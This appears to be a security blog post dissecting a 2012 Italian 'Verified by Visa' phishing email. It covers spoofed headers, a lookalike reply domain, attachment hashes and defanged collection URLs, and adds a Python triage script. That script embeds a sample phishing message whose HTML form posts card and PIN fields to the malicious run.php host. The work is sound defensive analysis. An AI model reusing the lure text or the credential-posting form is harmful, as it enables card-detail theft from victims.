Phishing: A causa del nostro recente aggiornamento. Verified by Visa

We have logged other phishing emails used to steal details of Visa users:

From - Mon Apr 23 16:04:50 2012
Received: from ser.just3d.tv (unknown [91.227.127.33])
Received: (qmail 23589 invoked by uid 0); 23 Apr 2012 13:21:36 -0000
Received: from unknown (HELO User) (admin@just3d.tv@151.58.16.184)
Reply-To: sicurela@visaltalia.it
From: "verified by visa" verified@visaitalia.com
Subject: A causa del nostro recente aggiornamento.
Date: Mon, 23 Apr 2012 15.21.34 +0200
To: undisclosed-recipients:;

Note the source of the message in the email header:

Received: from ser.just3d.tv (unknown [91.227.127.33])

That server has nothing to do with Visa. Note also the Reply-To address:

Reply-To: sicurela@visaltalia.it

Note that visaltalia.it is spelled with an l (lowercase L) where the name visaitalia has an i: a lookalike domain that is easy to misread.

The body of the email (translated from Italian):

Dear Customer,
Due to our recent update of our servers
(23/04/2012) it is necessary to update your profile.
For greater security and access, please fill in the
attached form.

We thank you for your cooperation.

Copyright Visa Europe 2012. All rights reserved

There is also an attached file named visaitalia.html:

File: visaitalia.html
Size: 20015 bytes
MD5: 2C76E9F667E78C8C32C09DBE1129969E
SHA1: 0A30FFC20AC311AF2831086D4B181E0F23483399
SHA256: 1757C6A066E61F1B3E9782570712641FC734E1C6ACCD1DA329F3B10B164136CC
SHA384: BD80E5B8A83A3C00D72B6367421AE85CC6A1FF8981F43D0D6784B52D0AAE58B22DD74293BD8735C8B0E4331C8CCCDA02
SHA512: 4B82AC139180E6B19C58A553456BBE30CE155E22A695E300115CAC5C8BDB3F84A024CCDF104E280162B0C44AF1495C850CA3565533DE62EC6F14EF7754295A30

The attached file contains the form that sends the typed details to a remote server. Listed below are a few malicious links extracted from the attached HTML file:

hxxp:// leonidasvancouver .com /admin/plm/plm.html
hxxp:// rottenfish .de /vbv/plm_files/Logo-Mastercard_Secure_Code.gif
hxxp:// rottenfish .de /vbv/plm_files/fin_VerifiedByVisa_186x79.gif
hxxp:// rottenfish .de /vbv/run.php
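As an added example (not code from the original post), here is a small Python triage script that automates the checks made above: it compares the Reply-To domain with the From domain, flags lookalike brand domains such as visaltalia.it by collapsing confusable characters, lists the hosts named in each Received hop, and pulls the form action and referenced URLs out of the HTML attachment. The sample message embedded in it is constructed from the headers quoted in this post; the HTML body is a stand-in for visaitalia.html, the list of legitimate brand domains is an assumption, and the form action is assumed to be run.php.

```python
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains the brand legitimately mails from. An assumption for this example,
# not a list taken from Visa or from the post.
BRAND_DOMAINS = {"visaitalia.it", "visaitalia.com"}

# Substitutions commonly used to build lookalike domains (rn for m, l or 1
# for i, 0 for o); collapsing them makes a lookalike compare equal to the brand.
CONFUSABLE_PAIRS = [("rn", "m"), ("l", "i"), ("1", "i"), ("0", "o")]

# Hostnames and dotted IPv4 addresses inside a Received header.
HOST_RE = re.compile(r"[\w-]+(?:\.[\w-]+)*\.[a-z]{2,}|\d{1,3}(?:\.\d{1,3}){3}")

# Constructed sample: the headers quoted in the post plus a minimal HTML body
# standing in for visaitalia.html. The From address is written in angle-bracket
# form so the parser accepts it; the form action is assumed to be run.php.
RAW_EMAIL = """\
Received: from ser.just3d.tv (unknown [91.227.127.33])
Received: (qmail 23589 invoked by uid 0); 23 Apr 2012 13:21:36 -0000
Received: from unknown (HELO User) (admin@just3d.tv@151.58.16.184)
Reply-To: sicurela@visaltalia.it
From: "verified by visa" <verified@visaitalia.com>
Subject: A causa del nostro recente aggiornamento.
To: undisclosed-recipients:;
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<img src="http://rottenfish.de/vbv/plm_files/fin_VerifiedByVisa_186x79.gif">
<form action="http://rottenfish.de/vbv/run.php" method="post">
<input name="card"><input name="pin"><input type="submit">
</form>
</body></html>
"""


def skeleton(domain):
    """Collapse visually confusable characters so lookalikes compare equal."""
    s = domain.lower()
    for src, dst in CONFUSABLE_PAIRS:
        s = s.replace(src, dst)
    return s


def is_lookalike(domain, brands=BRAND_DOMAINS):
    """True when domain is not a brand domain but collapses to one."""
    if not domain or domain in brands:
        return False
    return any(skeleton(domain) == skeleton(b) for b in brands)


def header_domain(msg, name):
    """Domain of the first address in an address header, or '' if absent."""
    addresses = getattr(msg.get(name), "addresses", ())
    return addresses[0].domain.lower() if addresses else ""


class FormAndLinkExtractor(HTMLParser):
    """Collect form actions and every absolute URL the HTML references."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.urls = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        for key in ("action", "src", "href"):
            if a.get(key, "").startswith("http"):
                self.urls.append(a[key])


def analyze(raw):
    """Return findings, referenced URLs and Received-chain hosts for one message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    # Sender checks: Reply-To pointing elsewhere, and lookalike brand domains.
    from_domain = header_domain(msg, "From")
    reply_domain = header_domain(msg, "Reply-To")
    if reply_domain and reply_domain != from_domain:
        findings.append(f"Reply-To domain {reply_domain} differs from From domain {from_domain}")
    for d in (from_domain, reply_domain):
        if is_lookalike(d):
            findings.append(f"lookalike brand domain: {d}")

    # Received headers are prepended by each relay, so index 0 is the last hop
    # before delivery; none of the hosts named should belong to a third party.
    received = msg.get_all("Received", [])
    hops = [HOST_RE.findall(r) for r in received]
    brand_hop = any(h == b or h.endswith("." + b)
                    for hop in hops for h in hop for b in BRAND_DOMAINS)
    if received and not brand_hop:
        findings.append(f"no relay belongs to the brand; first relay: {hops[0]}")

    # Attachment check: where does the form post the typed details?
    extractor = FormAndLinkExtractor()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            extractor.feed(part.get_content())
    for action in extractor.form_actions:
        host = (urlparse(action).hostname or "").lower()
        if host not in BRAND_DOMAINS:
            findings.append(f"form posts typed details to third-party host {host}")

    return {"findings": findings, "urls": sorted(set(extractor.urls)), "hops": hops}


if __name__ == "__main__":
    report = analyze(RAW_EMAIL)
    for finding in report["findings"]:
        print("FINDING:", finding)
    print("URLs referenced:", report["urls"])
```

The confusable table is deliberately short; a production filter would use the Unicode confusables data and compare against the organisation's full sender list, but the structure of the check (collapse, then compare) stays the same.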

Both malicious websites are flagged as detected by URLVoid:

http://www.urlvoid.com/scan/rottenfish .de/
http://www.urlvoid.com/scan/leonidasvancouver .com/